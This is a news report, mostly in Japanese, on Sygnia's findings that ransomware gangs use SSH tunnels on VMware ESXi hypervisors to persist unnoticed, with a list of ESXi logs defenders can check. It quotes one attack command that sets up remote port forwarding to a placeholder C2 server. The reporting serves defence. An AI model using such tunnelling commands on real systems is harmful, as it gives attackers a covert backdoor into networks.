Ransomware gang uses SSH tunnels for stealthy VMware ESXi access

ESXiベアメタル・ハイパーバイザーを標的とするランサムウェアの攻撃者は、SSHトンネリングを活用して、検知されないままシステム上に潜伏している。

VMware ESXiアプライアンスは、1台の物理サーバー上で組織の複数の仮想マシンを実行できるため、仮想化環境において重要な役割を担っています。

VMware ESXiアプライアンスはほとんど監視されていないため、企業ネットワークへのアクセスを狙うハッカーの標的となっており、データを盗んだりファイルを暗号化したりすることができる。

サイバーセキュリティ企業のSygniaによると、多くの場合、既知の欠陥を悪用するか、漏洩した管理者認証情報を使用することで侵害が達成されるという。

ハイパーバイザーへの SSH 接続

ESXiにはSSHサービスが組み込まれており、管理者はシェル経由でハイパーバイザーをリモート管理できる。

Sygniaによると、ランサムウェアの実行者はこの機能を悪用して、永続性を確立し、横方向に移動し、ランサムウェアのペイロードを展開します。多くの組織ではESXiのSSHアクティビティを積極的に監視していないため、攻撃者はこれをこっそりと利用することができます。

「いったん(ハッカーが)デバイスに入れば、トンネリングを設定するのは、ネイティブのSSH機能を使うか、同様の機能を持つ他の一般的なツールを導入することで簡単にできます」とSygnia氏は説明する

「例えば、SSHバイナリを使用することで、C2サーバーへのリモートポートフォワーディングは、次のコマンドを使用することで簡単にセットアップできます:ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>”

“ESXiアプライアンスは弾力性があり、予期せずシャットダウンすることはほとんどないため、このトンネリングはネットワーク内の半永久的なバックドアとして機能します。”

Overview of the attack
攻撃の概要
ソースSygnia

ロギングにおけるギャップ

Sygnia社はまた、ESXiのログを監視する上での課題も強調しており、ランサムウェアの攻撃者が利用する方法を知っている重大な可視性のギャップをもたらしている。

ログが1つのsyslogファイルに集約される一般的なシステムとは異なり、ESXiでは複数の専用ログファイルにログが分散されるため、証拠を見つけるには複数のソースから情報をつなぎ合わせる必要があります。

セキュリティ会社は、システム管理者がSSHトンネリングとランサムウェアの活動を検出するために、以下の4つのログファイルを調べるよう提案しています:

  • /var/log/shell.log→ ESXi シェルでのコマンド実行を追跡する。
  • /var/log/hostd.log→ 管理アクティビティとユーザー認証のログを記録する
  • /var/log/auth.log→ ログイン試行と認証イベントの記録
  • /var/log/vobd.log→ システムとセキュリティのイベントログを保存する

hostd.logとvodb.logには、ファイアウォールルールの変更の痕跡も含まれている可能性が高い。

ランサムウェアの実行者は、しばしばSSHアクセスの証拠を消すためにログを消去したり、タイムスタンプを変更したり、調査者を混乱させるためにログを切り詰めたりするため、証拠を見つけるのは必ずしも簡単ではないことに注意すべきである。

最終的には、組織が異常を検出するために、syslog転送を介してESXiのログを一元化し、ログをセキュリティ情報・イベント管理(SIEM)システムに統合することが推奨されます。